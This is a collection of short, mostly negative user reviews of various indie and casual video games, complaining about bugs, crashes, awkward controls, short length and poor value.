Not that fun... Could be more fun. As soon as I tried to attach myself to an asteroid, the camera froze and I could notmove the camera. Not recommended.Fairly good graphics, though.Oh - And the controls are (fairly) horrible.It feels like this game was quickly put together just to make a quick buck.1.1/10
This game is really buggy. Every time I die, I cannot exit the score screen to start another game (or do anything else). I have to push the Windows key and close the game after I die just to play again. I sincerely wanted to play this game, but, unfortunately, the game apparently doesn't want to be played.If the developer ever gets the game running smoothly, then I will edit this review, but until then...
It's ... okay. Played on WMR. It's not very intuitive if you've ever played mini golf to reach forward once you've grabbed the ball to designate strength that way, it would make more sense to pull back for a stronger hit. Not sure if it's prevalent on all systems, but the vibration while holding on to the ball is incredibly annoying and insistent. The worlds rotate at inconsistent and it's finicky grabbing onto the ball. It's a cool concept and I love the idea, but there's a lot of little things they could fix for a more pleasant experience. Played like 10 minutes and probably won't go back anytime soon.
I have to agree with the other reviewers. The story is intriguing, and the art style is pretty nice. But the controls are unresponsive and glitchy. Attacking is slow and I wasn't even sure what all the moves do. One of them seems to pull up my menu and use MP, but otherwise nothing happens.On top of that I fell off the first platforming segment four times in a row. I'm not the best at platforming, but I'm not usually that bad the jumping was just really awkward. And when I say I fell off I don't mean I died. I mean I fell off and then was able to walk along the bottom of the screen across the map. Until eventually I walked over a portion of the bottom of the screen that was actually a hole and died. I'm not sure which part of that was a glitch.I feel like there is a good game in here somewhere, but personally I just bounced off the control system hard. It is in early access though. So hopefully the control scheme will be smoothed out. My concern is that it's not a bug, and it's intentionally supposed to be like this.
Full disclosure, I didn't get very far in this game.I played for about half an hour, then the game hard froze. I don't know if it was the developer's fault or not that the game froze, could be a script that go set to autorun (something I've done to myself while playtesting before)  or just bad luck. Either way, I was underwhelmed enough that I decided it wasn't worth trying again. You spend a lot of time walking across pointlessly large maps, which are under inspired in terms of design. The dialogue and setup were mediocre. I got it for cheap so I'm not upset, I just couldn't recommend it.
The main problem with InFlux is that it doesn't matter that you're a ball.  Rolling physics games, like Marble Madness, rely heavily on conservation of momentum as a game mechanic.  InFlux does not.  You have very good control over your movements and can arrest your forward momentum at any time.  Moving slowly often makes the uneven ground difficult to traverse, but that's more an annoyance than a gameplay mechanic.  There's no incentive to dash madly through levels, not in the least because you spend the navigation levels searching for hard to spot motes of light that you need to unlock the next puzzle.The game has some ramps, but you don't so much roll up them as you hit them at speed and bounce into the air.  Once the game introduces the boost mechanic all semblance of ball relevance goes right out the window, as you can use it to easily turn on a dime at tight angles and even essentially freeze time in mid air to target perfect landings.  Overshot your mark?  No problem, just boost again and turn yourself around.There are some puzzles that involve rolling a ball into a receptacle but that ball is not you.  It's a different ball.  And you don't manipulate it by hitting it like a cue ball or a bowling ball -- you have telekinetic powers.  These puzzles would have been much better if you were the "scoring" ball and the game actually forced you to behave like a ball.But instead, InFlux is just a mediocre first-person puzzle game with some reasonably pretty landscaping that is in no way relevant to navigation by a ball.  You might as well be a tiny person with a gun that fires attracting and repulsing waves -- in fact, I have definitely played games where I was a person and my momentum was more difficult to control than it is in InFlux.  At the end of the day you are a character with a motor skills deficiency trying to solve spatial puzzles.  The net result comes across as unfortunately frustrating.It's obvious that the developers put a lot of work and care into this, but it suffers badly from some poor design choices.  I can't in good conscience recommend it to anyone but the most diehard of spatial puzzle fanatics.  I definitely don't recommend it to anyone looking for a ball physics game.
Interesting little project.  It would be great if they would finish it though.  You can tell that there are a lot of things set up in the game that are not complete.  Various objects lying around that you cannot interact with and lots of room left in the achievement book.  Tweaking the controls would be nice as well, for example, make the character move to where you click instead of having to use the keyboard to move around.
This game is absolute garbage. I like monopoly, its a fun game that really comes down to luck, and the specialty rules add some variety for those who like to play more often in groups. But here's why I hate this particular version of the game. First, Monopoly Plus makes you log in to Uplay, which is already a downside. Uplay sucks and it makes me type in my username and password *every* time no matter how many times you click "remember me." I've never gotten any support with Uplay issues like this. It also sucks because you have to join people's games through Uplay, meaning you have to add all your friends again on Uplay. This completely defeats the purpose of buying it on steam in the first place. Second (and much more important), having played this game often with friends in multiplayer, it crashes consistently. We've had a lot (if I had to guess, anywhere from 25-33%) of games end because in the middle of a trade, mortgage, auction, or any other small pop-up menu, whoever's turn it is can't select anything. It's analogous to the old Xbox "Red Ring of Death", as soon as someone can't select a few options, the game is over. Its random, doesn't seem to be anything to do with how fast or slow you press buttons or do certain actions, and it really sucks. It often happens just when the game is getting good, and thus is an extreme disappointment because the whole round/match ends up being for nothing for everyone. And no, there is no way to save a game midway or pickup from another point. Furthermore, I have never seen any actual updates for this game, and I doubt Ubisoft will ever bother to fix a $15 game that they didn't invent in the first place. Also worth noting here that you cannot play with AI and multiplayer at the same time, you only get bots in multiplayer if someone disconnects. Adding insult to injury, reconnecting hardly ever works (even though it seems its meant to), and playing with only 2 or 3 people total isn't nearly as much fun as a 4-6 player game. Third and final, there really isn't any DLC or expansion to this game. Being not just Monopoly, but Monopoly PLUS you might think that you'd be able to add different themes and such. IRL, I have electronic banking and Futurama in addition to classic (haven't touched any in forever, not many friends play board games irl lol). However, all you can change in Monopoly Plus is how the center of the board looks and add a specialty rule. You would think you'd be able to buy some extra 99 cent themes or something (more like $5 themes coming from Ubisoft). Sorry if this sounds like an absolute rage quit review, which it kind of is considering I had to give up another round tonight because it froze again. I just think that the fixes to this game would be easy considering how simple of a game it is. This isn't an open world adventure game with hundreds of quests, its monopoly. Yet, somehow this game seems to be seriously lacking in terms of being able to maintain its basic operations. TL:DRThis game isn't worth $15 because in multiplayer it often crashes/freezes the game with no way to save throughout and there's not many game play options or any way to change theme.
The game started off fine. I like adventure games, and while this type of "adventure game" isn't what say Gabriel Knight or QFG was, it's still fun especially when I have nothing else to play. It's also luckily not a hidden object game, disguised as an adventure game. It looks good and has a good atmosphere, and so far I was digging it as much as the Drawn series. I kept having these crash to desktops with a pop up dialog box saying "error in gc" (which, given it's made in Unity means a garbage collection issue). Minor inconvenience which I readily ignored as restarting put me right back where it left off. However, I got to a point halfway through the game where I was reading a diary I uncovered from a locked safe (won't spoil it, but it's in the place soon after you get the 1/2 way done achievement) and it crashed while reading the first page. Restarted, put me right back at the first page so I thought whatever, no big deal. Got 2 more pages in and it crashed again. Restarted and on the main menu it told me my profile was corrupt and it was DELETED. So all progress completely wiped and now I would have to start all over again. Which I'm not doing because how do I know I'm not just going to run into a similar bug at some other point.
Update: after playing the third game, I think everyone should just skip the first two games. They subtly rewrite some of the story and it seems like they basically took the general premise and theme and started over. The third game is actually good and feels like it was made by a completely different team. In my opinion you won't miss anything by skipping the two first games in this series.Old review:This is a huge step up from the previous instalment. The story is used for more, and the puzzles are better. However it is still mediocre for a HOG on both those fronts.There we multiple times where the HO scenes were "off" in respect to their surroundings, and where you triggered them, which was a bit jarring. There were fewer typos, but there still were 2 or 3 that I noticed.Some of the HOS suffered from reuse or poor wording. Some might like that, personally I consider it a sin to have two objects in a scene that both fit a word. Scythe was used twice for the same HOS where there were two kinds of scythe, one was valid for the first time you played the HOS and for the second time it was the other so you had literally no clue which was which.Some of the puzzles seemed... Lifted from elsewhere, or like someone had helped them but they didn't know what to do with it. Hard to explain without making this review really long. The same feeling appeared in certain sections of the game, where the... feel or style felt different. Markedly the very first part of the game started really strong, and then nosedived a few puzzles in.The story was... Meh. At least it felt more present than the previous game, but it was still bad.Overall I can't recommend it, not even on sale, but it is passable if you're absolutely out of HOG options.
No updates since release. This is a very buggy game. the controls dont really work like you would want them to. the NPC will overpower you. and their is only Just One Level One small Terrain. Not worth it even if it was free at least for now
The game definitely has it's pros. The artwork and spriting is beautiful, the music is creepy and fits right in with the theme, and the puzzles aren't overly difficult and easy to work through after a bit of exploring. However, having said this, the grammar is horrible. There were so many mistakes here and there that could have really been easily avoided or fixed. The programming doesn't work correctly in certain parts of the game causing the program to loop even after you have already activated. (In one case I got stuck in an endless loop and had to restart.) The story ends abruptly and calls it "closure" and it's easy to get killed off without much warning forcing you to save a lot, lest you reset and do a bunch of tasks over.Overall I would not recommend this game.
When It Says: Press any key to continue. i press a key noyhing happens
There are things you take for granted when you're reading VNs, that you miss when absent.  Screen transitions between scenes and days.  A distinctive text difference between your actual speech and your inner thoughts besides italics which you can barely distinguish.  Backgrounds that change based on time and location.  A pacing which lets you take your time and enjoy the experience before it's suddenly over.  A readable text background that doesn't make your eyes hurt after a few minutes (seriously, that bright red is enough to blind someone...)This game lacks all of those things.  It's a breakneck adventure with sudden jolts between scenes that is difficult to keep up with at times.  Whenever I started to feel myself enjoying the experience, I was jolted into another scene and the immersion was broken again.As a first attempt at a game like this, it's not terrible.  A $10 price point for this 2 hour romp through a fairly token story is a little steep.  You wouldn't regret paying a buck or two for it if you're tired of trips to feels town and just want a light-hearted romp with a few girls.I can't give a full recommendation in this state, but I'm still curious for the sequel.  If they smooth out some of the rough edges in the interface, learn about pacing, and make the game a little longer, Highschool Romance 2 could be a solid game.  This one just isn't quite there.
I guess the game is good, just not for me. I have to downvote the game because it's on rails while being very rough around the edges. After having played the awesome War Robots VR demo which wasn't properly funded into the full game I was curious in trying this that I became disappointed once I found out it was very rough around the edges as well as on rails.  The whole "on rails" killed it. I could have tolerated the aiming from the head and the shooting, yet the linear gameplay.... So annoyed by that. If you're going to keep updating the game I may come back to change my negative into a positive.... Until then I'd rather suggest War Robots VR. Sorry!
It's not a patch on the original Zoo Tycoon. None of the scenarios seem to be winnable after the intitial introduction ones and it's plagued with problems, such as vets not treating animals, animals not eating food, etc... The free form games are probably OK, but come on, when will Steam have the original Zoo Tycoon? The only reason I bought this was because I miss the game as my pc will no longer play the CD ROM of the original (and you can't seem to get computers with disc drives now.) The graphics aren't as nice either, nor is the section of animals in the game is as extensive, though I could have put that aside if there weren't so many bugs in the game.
The Main character is annoying af
its nice
EDITed completely after finishing game.This is a lineair RPG with turn based combat, and lots of written dialogue, without dialogue options. Pro's:- It looks, feels and plays as the console (Super NES, Nintendo, Sega) RPG games of 15-20 years ago. Original Zelda style.- It does not involve much planning, strategy, it is really straightforward, and so is rather relaxing (I played part of it while being drunk :P)- It looks kinda cute, and it's simplicity is refreshing.- They tried their best to create some lore and story.Con's:- MAJOR CON (reason why I downvoted): It is really really short. Just when you think the world opens up and you gathered stuff and companions you suddenly are told you face the endboss :( Seeing the whole map (most of it not used), and the way things are designed I get the feeling they decided to release it half finished, or they plan on releasing DLC.- The art is often a bit too clumsy, and even amateuristic. - Story and lore feel like coming from nowhere at times (maybe I am missing on a known universe), and the end feel very abrubt and sudden.It was good fun while it lasted, as I am a sucker for the Zelda style genre, but even now with discount at 7 euro, I find it dissapointedly short and unfinished. If it would have twice the current content I would surely recommend it.Full playthrough took me maybe 8 hours (I had to start over for technical reasons), and if you rush and skip it can be done in 6 I guess.If you buy it, Alt+Enter will make it fullscreen (no tutorial on interface and controls whatsoever)
WAYYYYYYY too much dialogue like I get having some, but it just drags on and on, Positives: LOVEEEEEE the art style,  Love the scares that happen, I think that the story is very interesting and pretty creative
Sub-Par
Cute premise, but it could have been done so much better. It's a very short game, with only two pairing prospects and limited development of character. At the end of each route I was left thinking, 'That's it?'
Doesn't work. Pg Up/Dn doesn't do anything and neither does the press enter. Aka I can't progress, the sandbox works but I don't like the fact that the memory adds in 1-9 then appends letters just confuse me. And Since I can't do the tutorial, I can't understand it. Great concept, poor execution.
aku sedih memainkannya karena berbeda dengan ludo lainnya
cant find a game
It's a flash game from the early 2000s. Not worth paying for.
More frustrating than fun. The minigames are chaotic, way too fast, and tediously repetitive. Constantly being robbed, blocked, and attacked is both boring and tiresome. I guess the story is interesting enough, but for a primarily text-based game, the quality of the writing is very poor -- an editor would be a great investment here.
This game is basically DDR: Geocities Edition.  Want to see more?  Watch it here: https://www.youtube.com/watch?v=Cc3a6U0Evmk
The game in the state its in right now is very bland and it gets boring pretty quickly
I thouht this was a simple farming game with some mining and hunting, but, it is not.  In fact there are all kinds of Luciferionsymbols and characters in this game. Vampires? really?  The image of the old stranger, though it only shows the head and shoulders, appears to be naked. What is with that?  The music is too loud and cannot be turned off, I had to turn off my speakers.  I am removing this game from my computer.  It appears to me to be an attempt by some Satanic cult to gain access to me and mine.   I do not recommend this game, in fact I would stay away from it.
I really hate to give a bad review to this game. I like the way it was done graphically and with a nice story behind it. But, it's the way the game was created that causes me to not give a good recommendation for this game. Despite the play time Steam has, my internet was down for three days and had played it for some time during that period. First thing I noticed was the erratic way the character would move while point and click at a location on the screen. Sometimes the character would pause then  "jump" to a position  that you clicked on. Secondly, at other thimes the screen would freeze for a long time before you could continue on.  Third, the game would crash, unexpectantly. This happened several times when I played and had to restart at where I saved.And last, sometimes the game would not save, even if you did a save. Then you would start from scratch.So, this game isn't bad, just needs a lot more work at optimizing and fixing some bugs. Then, I think they would have a nice game to play. But, for now, I have to say no on recommending it.
While I make this a negative recommendation, let me extrapolate and add in some of its good features.The games is fairly retro pixel, and has a sound track that is easy on the ears, if you're into that sort of music. The game is fun for wasting away a bit of time each day, but beyond that is at the end of it not that different from a lot of other idle clicker games. The only thing with this one is that you pay once and don't get bothered by money grubbing offers to speed up your progress like with most free ones.That said, why a negative?Well, first and foremost, contrary to images on the store page... it's not like that at all anymore. Whether for the better or worse, hey... that's not for me to decide. Then there's claims for having a variety of builds to your approach to things and complexity... frankly, I've played a fair amount of games and clickers, and maybe it's just me but it's not any more complex in my eyes compared to plenty other free clicker games out there.The only actual complexity that I found in this game was to figure out WHAT the options were in menus and WHERE to find them. Took me nearly a preliminary playthrough and puzzling over this ridiculous expertise system that needed medal pieces to finally realize there was a way to BUY yourself a higher military rank.And speaking of... your 'build' options are just a bunch of 'expertises' that offer you on 4-5 separate levels option A or option B that offers a bonus one way or the other. Basically it comes down to ACTIVE vs IDLE play where it seems to me the A option is always for the more active approach, while the B is for the idle approach. Mind you, only idle WHILE the game is playing.So, money wise, at least you don't spend a fortune trying to get anywhere and it's only for the purchase of a fun idle game to mess about with if you have some idle time to fill up and you just want some MINDLESS puttering about shooting aliens and whatnot. But to say they deliver as claimed... NO WAY!
Interesting concept. However the author of the game does not seem to understand that puzzle games and time limits do not go well together. Time limits do not make puzzles fun.
It's ok, But the response on controls combined with the timing required for some of them is ridiculous. You can't give out 20 seconds total to click out 4 16bit decimal to binary conversions if the UI takes a second to response to each mouse click and delays by 2 seconds to display each one, so we get effectively 3 seconds each. Rage quit it after that. It is just stupid you need randomly get three less than 3 active bit numbers in a row to even have a chance. Allow us to tab through them and speed up your UI response.
I wanted to like Filament. It looks great, there's a mystery in the story that intrigued me, and some of the puzzles are fun and challenging. Overall, though, the puzzles are inconsistent, with some sets being really easy all the way through, some being just challenging enough that if you figure out the logic you can solve them, and some of them that don't seem to make sense in how they respond to my attempts to figure out how they work. After about 5 hours I got tired of the third kind and gave up.
First of all, don't look at my playtime, 90% of it was spent alt+tabbing elsewhere, genuinely forgetting that I had the game on.I would have appreciated this game more as a teen. It's short and simplistic, and I honestly wasn't able to get attached to the characters or enjoy the story.It also had some freezing issues due to DRM that were, thankfully, resolved by the dev's quick intervention.
 There is simply no excuse for the new mobile tier UI. This franchise exist thanks to the money of the PC USERBASE; there is nothing wrong in trying to reach a new audience (mobile) but this cannot be done at the expense of the original and loyal pc userbase. Alt + Enter if i want to go fullscreen? No setting whatsoever except volume slides? Nope, not acceptable
If you enjoyed Monster Slayers, Dream Quest, Card Quest, or Slay the Spire, then this game is not for you.Yes, I know this game isn't Spire and doesn't try to be, but most games in this genre are going to be compared to Spire for the obvious reasons.The game suffers from a distinct lack of information about...anything, really.  You've symbols representing different things on screens, but a lack of tooltips means you'll just have to make do without really knowing what's getting a bonus or not.Enemies don't telegraph what they're going to do.  Some enemies may have different attacks they will RNG through, but there is no way to click or read about what an enemy COULD do.  At all.  You just have to encounter new enemies and wait and see what they and hope that you remember every enemy's possible actions.  The game uses resources to play cards (Stamina/Energy and Mana) but you are locked to playing 1 card per turn which feels incredibly out of place and janky.  This means, typically, you're going to take forced damage from enemies since very often you can't clear them all in one turn and you have no idea what they're going to do each turn.Damn shame, too. Because the art is fantastic and you can tell they put a lot of time in it.  The overall feel and leaves much to be desired and don't expect any wide changes, as the problem with the 'feel' lies in the core game mechanic.  There are, in my opinion, much better options out there. (Spire/Monster Slayers/Card Quest. Dream Quest sucks balls.)20 minutes was all the time I needed to decide this game wasn't going to work for me.Bonus: Have a burner email account handy because they require one, for some reason.
This game is great for the first hour or two...but then you realize those two hours are all the game has to offerliterraly, just that, the gameplay never changes, barelly gets any harder (if anything it gets easier) and the actual comedic (yet still good) scenes are few; and the entire thing just feels padded all to hell.I can see this game being a lot better and lasting a lot longer on mobile... but it just does not fit a pc release at all.only get it if you REALLY need to play it and dont have a switch, and even then, wait for a big discount.unless you have a switch, then get it to play on mobile here and there.
Same voice actress, you can shower with them, but they shower with their clothes on, like some damn heathens, where are boobs?
This was quite a weird game to play and it does have some charisma in it, maybe it was for the puns or jokes that unga boonga said, maybe it was for the attempt of making some interesting game mechanics like the log jumping or maybe it is due to the awful graphics that does have some identity instead of those ♥♥♥♥♥♥ asset flips or maybe it is due to the unpolished gameplay or for it being an obvious unity game.I mainly bought this game to see if this could be the next bad rats. But there was something that I did appreciate from this game. But to be honest the game is bad and there's no way around it.You know that the game is not good when the game flintstones the rescue of dino and hoppy (or better known as 7 grand dad for the high quality rippers) has better game design, more polished gameplay and it came out decades ago (even though that game is decent/good).Gameplay: This is the main focus and the biggest problem of the game because the game is very unpolished and it clear once you play the game. But it also tries 1 or 2 interesting gameplay mechanics that was too ambitious for it.The gameplay is your typical platformer where you collect items and you go through a certain place where your family is located in order to beat the stage, through it you'll find some different obstacles that you'll have to face in order to collect all of the stars (yes, it's one of those mobile looking games with a 3 star raiting) and some other animals that will block your way.The 3 main (and biggest) problems are that it's unpolished because you'll have some trouble with certain tools (like the stone wheel or the log) due to their physics not working for you and that it has horrible game design because of the placement of the enemies and how some spikes are located and the fact that they don't have predictable patterns.There's a good reason why good platformers have predictable patterns and some of the random parts do have some sort of a patter, because that helps with speedruning and to have a higher success at getting the high score. Since the spikes are random it can be very hard to progress without getting hit.As for the enemies they don't have a predictable way to attack you, this is especially with snakes since it's very hard to avoid those ♥♥♥♥♥♥♥. And worst case scenario is that you won't have much room to jump above them, thus you'll have to risk taking hit in order to progress.And finally you respawn completely at random when an enemy hits you. Since sometimes they hit you and you still go though the stage, while in other times they hit you and you have to start from the checkpoint. This inconsistency can be very annoying. And if you add those 2 you'll have a bad time, minutes of frustration and some deaths that could've been prevented if you could've had more space, proper hitboxes or more polished gameplayBut the unpolished gameplay can work in your benefict like a double edge sword. If you know how to exploit this you can get though some areas faster or avoid getting hit.Another problem but not very big (but it would've made the game more tolerable) is having an attack button, I do appreciate that they tried to make it more challenging by having to avoid enemies instead of confronting them, but thanks to the bad design they don't have the luxury to have that. At the very least making me kill some snakes, little bugs or velociraptors would've made this more tolerable and would retained some hearts.The tools are typical things you've seen in other games, like a trampoline, a wheel, a fountain, etc None of them very special. but there's a thing that I have to give credit, the log mechanics are very interesting, it does uses the physics of wall jumping but is a more clever way to get through the other area. It consistes of putting the log near the edge and going through that edge on the log, then as the log goes down you go to the other side so that you'll gain momentum to go jump to the other side.Now that doesn't mean that it's 100% good, since it suffers from the previous mentioned elements.Finally there's a system of upgrading your hearts and energy when you have 5 stars, I recommend using more on hearts than energy (2-1) but you shouldn't discard energy since it does help in the long run.Controls: Unlike the unpolished and horrible game design, the controls are decent and you won't have problem handling through most of the levels that is untill you jump, since it does have a very short range unless you're on a trampoline or an object. I've played worse.Story: The game has 0 story besides gathering food for your family, so there's no point in considering it.Graphics: Let's be honest, they're ugly, ♥♥♥♥ and not pleasant to look at. But I did for some reason like them and it does irradiates charm. There's something special about bad graphics that they kind of grow in you. So I'll give them a positive note.Soundtrack: Generic but it serves it purpose and it's typical caveman songs. I did like them though and didn't mind listening to them for hours.Extras: Part of the charm comes from the puns/jokes that unga boonga spews, they're hit and miss, since not everyone will find them funny but It's a nice thing they've decided to put in the game.Overrall: I kinda enjoyed the game and for the ridiculous price that it has it might not be a bad buy. And a part of me wanted to recommend this because it's not that horrible. But it is bad no matter how you look at it since it suffers from unpolished gameplay, bad game design and lack of a game attack, and those 2 things killed this game from having a positive review since they're very important points to consider.You're better of looking for another game that has solid gameplay.This game is very easy and didn't mind the harder stages, but due to the previous points it makes it a chore to complete it 100%.
Reptitive game, time management over and over again.Game is expensive.
Played for a few hours and that was a couple of years ago havent seen an update in a long time
Not worth the money even at the 90% discount. The game has a story, but doesn't even have an ending! You just get to level 40 and it's completely unfinished. Bleah. The gameplay is okay, but nothing worth writing home about, and there's no real motivation to get gold vs silver in the individual games.
Putting the beam from a beam from point A to point B will fail and it will break but putting one from B to A but in the exact same layout will work...
I really loved the original game back in the early 2000's.  Thought I'd grab this for nostalgic purposes. Unfortunately, this version of the game does not live up to the older one.  A couple of key points: This one has done away with crystals entirely. This takes out a big element of complexity in the progression of the game and makes the hero choices much less important.  Also, in the past when playing, if you stayed too long at a certain area after leveling up, the likelyhood of negative "random" events increased. Instead,  in this version, all areas seem to have equal chance of negative events happening, regardless of how long you've stayed there, and it is overwhelmingly negative events that occur (I'd estimate 75-25%, and they are much more significant ie. in a typical positive event you gain 50 resources, negative you lose 800).  Also, certain areas gave you a higher chance of receiving specific daily bonuses if remaining in that land, that element has also been removed.  Daily bonuses almost never occur.  Overall the game has completely gotten rid of any element of strategy and made everything entirely random.  This slows the game down so much that where it used to take me an hour or less to progress to in the game, I've played over 4 hours and am not even close to getting there. Just play slots instead. It's more fun and you probably have better odds.  Sad I played too long to request a refund hoping for this game to redeem itself.
Dose not work on my HTC vive osmos cant pick or click anything am stuck on the menu .. dont buy it its a waste of your monye ..
The game results to be boring because the "puzzles" are too easy. There are details that could be polished. Although I find the game visually pleasing I didn't find the game enjoyable and I would not recommend it.
It's outdated. Doesnt have Halfwalls and ♥♥♥♥. Use Fortify
I wiggled her titties a bit ... uhm nothing much happens in this.  30 minute game.
Well I left for a while and came back; my save is gone. It's a lottery. When will I lose my save? Today? Tomorrow?
I want to like this game. I LOVE the board game. But the remote play keeps breaking for me (especially if a controller gets involved) and seems to be the ONLY way to play with friends. I want to play this with my board game group especially during this pandemic, but until multiplayer is added in a better way, I'm holding off. A pity...
Looks amazing. Make a lot of fun! BUT it crashes every 20 to 80 minutes... You end up sending more crash reports than collecting trohies. -.-
Pros:* Lovely graphics, feels like playing an elaborate tabletop game.Cons:* Lacking basic GUI. No options to pause of fast forward the game. * No tutorial.* Not everything is translated into English. E.g., some traps have been left with their original Russian captions.
Might as well move the cursor around in Microsoft Excel.
Bugs such as vital mission equipment disappearing and not coming back and low framerates. Is also just too short for the price tag.
This is not a game - it is a bad joke.I answered 2 questions and then the game was over that means it took less than a minute to play that game !There might be a path that takes longer but i want my choices and not the "right" choices (which are "right" for only the author of the game). Also keep in mind that the game only has 60 MB in size so no wonder that it is that short.Wow - to write this review i have to repeat the game 5 times to get at least 5 minutes of play time and guess what - no path takes longer than a minute. Not even worth 99 cents.
I would not recommend this game to other players.Given how small the pool of feedback is and how mixed the feedback was when I bought the game, I figured I would give it a fair shot.  So I played it for the full 5 hours and completed it (100% achievements).  I really wanted to like it and I kept waiting to see what everyone found so charming about it.  If the combat had been simplified or shortened dramatically and a mini-map had been provided, a 5 hour trudge could have been a fun 1 hour journey.  However, the developer could not charge you for a 1 hour journey.Pros: It's an indie game.  It's kinda cute.  It has a simple plot.Cons: No volume controls at all.  I had to go to my volume mixer to mute the game.  I did not realize there was controller support until 2 hours in when I noticed the icon on the steam page in my library during a break.  There is not a mini map, compass or any other guide through the monster areas and I often wasted a great deal of time walking in the wrong direction.  The lack of any tutorial or explanation of controls was extremely frustrating.  I was very nervous hitting "esc" to see if it would pull up a menu or close the game (I had not figured out how to save yet).  Final thoughts: I really wanted to like this game (hence the 5 hours and 100% completion).  I think I bought it on sale for less than a dollar.  However, I have played and enjoyed free flash games that were more complete in at least one aspect (game-play, combat, story, design).  I would not recommend this game.
I was very excited when the appnori games began to get multiplayer updates.  The developers seem competent with a steady amount of updates that brought different things such has graphical settings, and even catering towards people of either hand dominance.  Unfortunately a friend and myself are not able to connect to the multiplayer servers.  We've tried to globally connect as well as direct connections.  We've even tried to simulate a local area network just to get it to connect peer to peer.    All of this was not successful in the end and we are unable to try out the multiplayer.  Although the game itself has a lot potential and continues to play better every update, there are many flaws in it as well.  I would like to see a wider variety of locomotion in this game to accomodate diffrent play styles and areas.  Not everyone would like to be teleported for instance. This is a paid game and at 15 dollars it is a bit weird to see ads in a game.  I know they probably need to get their revenue back; heck the way they implemented the ads is pretty creative being on the billboard in game and all.  At least before all of that is set aside I would like for at least the multiplayer to be functioning.  These sport like simulations could potentially be great for esports type competitiveness, and it pains me that we are not quite there yet.
Do not buy this game. It's disjointed and incoherent, I had no attachment to the story or characters, and what little tangible story it did have didn't feel like it belonged in the Demon Hunter series at all. There were two very problematic puzzles: one which was a math/logic puzzle with a flaw in a clue that made the math for the solution wrong, and the other, a hidden object puzzle where one of three symbols to find did not render in the scene.
Good idea, but sadly it's both very easy and really short. Adventure mode could be beaten in under an hour and the action still manages to feel repetitive after ten minutes.It uses same mechanic as Red Rope, where you make enemies vanish by touching them with a rope that connects two playerss. BrambleLash makes this too easy by keeping the rope a straight line that can be stretched and shrinked at will. Dying is very forgiving. There's a maybe four different enemy types and few powerups. The adventure mode is nothing more than a few battle arenas connected together without any meaningful way.BrambleLash has potential to be a lot more, but for the content it has to offer, it feels like a short demo of a full game.
There are some RPG maker games I like. Red Haze, World's Dawn, Rakuen and OneShot to name a few. But when people say that Skyborn belongs to the best/good ones, then my opinion would be: No, just no. -----------------------------Story: 6.5/10The main character and mechanic Claret Spencer lives in a world ruled by a race of Winged Humanoids known as the Skyborn, who use their magical powers to oppress humans and persecute the half-Skyborn "half-breeds". Yet a resistance movement led by the Zorro-esque "Red Spectre" is gathering strength in the shadows. Claret soon ends up deep in the inevitable showdown.It doesn't sound neither good nor bad. Solid enough to make a game out of it. Sound: 6/10 The music is by far Skyborns best bet. I haven't listened to anything since my last full playthrough but going through the OST, it's actually not bad. At all. The battle theme and the main theme are my personal favorites. Graphics: 3.5/10 The general opinion is in favour of Skyborn's graphics. Funnily, those are similar to the "enhanced" graphics of Steams release of Final Fantasy V, where people like to go ♥♥♥♥♥♥♥♥ because of how whacky the sprites look. Well, Skyborn might either be on par or one level below of FFV's design. Gameplay: 3/10The gameplay is your usual mediocre RPG style without any twists. Run from point A to B and fight uninspiring battles with almost zero strategy. Brute force usually prevails.Presentation: 4.5/10The rating might be a bit harsh but I can't remember anything memorable about locations or characters. They were just...there. Which is not enough to be fair. Replayability: LOWNot much to say. Once you've beaten the game there's no reason to go back.----------------------Final rating: 45/100
Quite a basic and boring game.
I uninstalled it after a couple minutes. The UI just frustrates me so much. You can't see how much the spendings/earnings from a building will change if you upgrade. You can't see how much an upgrade will cost. You have to right-click before you change the type of building in a menu? I think?
Total scam, avoid! They took some old crappy bakery simulator and re-decorated it. Even left "bread" and "bakery" in some places, were lazy to translate it properly, I guess. Interface is bad and confusing, engine is very outdated. They marked it as "adult" game with "sexual content" and put a high price. There is nothing of it there.
nah! don't buy this game
The game servers are down, so achievements and other features will not work in offline mode.
really really short game, not worth the money Challenging Adventure set in Victorian age London: not really at allDiverse mix of Puzzles and Hidden Objects: 3 different puzzles is not diverseBeautifully drawn locations: standard graphics for still lifeCaptivating Soundtrack: what soundtrack?????Based on the famous novel by Charles Dicken: very very very loosely (you dont even interact with anyone)
+ the idea is great. managin' your own kitchen, upgrade it, produce good food and make customers happy.+ i like that you must gain stars by working hard. the "day" is also great. prep-time, opening time and some prep time when its closed. + love the animations- no customization whatsover. most items have certain places where u can put em. thats it. no custom outfits, no colors for the kitchen etc- customers order foods i can't make. i lack the machines to produce some foods. - graphic glitch of food showing up shortly and then disappears again- tutorial could be better- recipe book is way too confusing while it lacks important information. for example "pizza margharita" shows me 2 cheese, 1 tomato &amp; 1 ? as ingredients. Customers order this dish, but I can't make it (dunno how to figure the ingredient out)- I unlocked the farm but I have absolutely no idea how it works. And I have no idea where I get seeds from.All in all: A very lovely, good idea, but it lacks some important things; like you should be able to decide your daily menu (for example if you don't have all ingredients for curryrice, take curryrice for this day off the menu) or hire some staff. A desicion between staff and machines would be nice.
This game's controls are awful and ruin the experience. It's not well designed, and is not worth playing.
People make comparisons to Plants vs Zombies. I'm only a couple hours in and found it frustrating. On Veteran Mode, your towers feel miniscule compared to the enemy hp pool. Winning on some level requires taking exactly the right towers. Towers are overall very boring, the first 5 you get (compared to Plants vs Zombies): Sunflower, Incredibly Weak PeaShooter, Frozen Pea Shooter, and then you get the two worst, a Bomb and a Landmine. I keep waiting to unlock good towers but the only ones I've gotten are an Ember-shooting Grill and a Fire Hose. Everything else makes me want to wait till the next good thing comes along. Developers seem to care about the game but I don't know how much they've actually played it on Veteran......Hope this helps.
The game doesn't even work. http://steamcommunity.com/app/361950/discussions/0/350533172691397404/
